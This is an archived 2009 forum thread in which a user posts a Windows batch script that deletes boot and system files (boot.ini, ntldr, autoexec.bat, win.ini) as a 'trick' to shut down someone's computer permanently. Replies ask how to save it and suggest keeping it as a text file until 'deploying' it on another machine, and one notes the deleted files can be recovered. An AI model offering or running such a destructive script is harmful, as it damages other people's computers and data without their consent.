View Full Version : Trick How to shut down a computer FOREVER!


pradeepit33
7th September 2009, 17:34
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Open up notepad and copy and paste that. Save it as a .bat file.

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.

REMEMBER - DO NOT CLICK THIS FILE.

xan123
8th September 2009, 02:29
save it, but dont test it on your PC! ;d

rbeldua
8th September 2009, 03:17
save as by what file type?

imran74
8th September 2009, 23:53
I think its in *.bat.
Posted via Mobile Device

yDdraigGoch
9th September 2009, 00:10
better to save in .txt and copy/paste as a bat when deploying...
that way you don't run on your own PC by mistake.

floodika
21st September 2009, 22:27
It just deletes some files. You can get them back with GetDataBack or something. 'FOREVER', lol...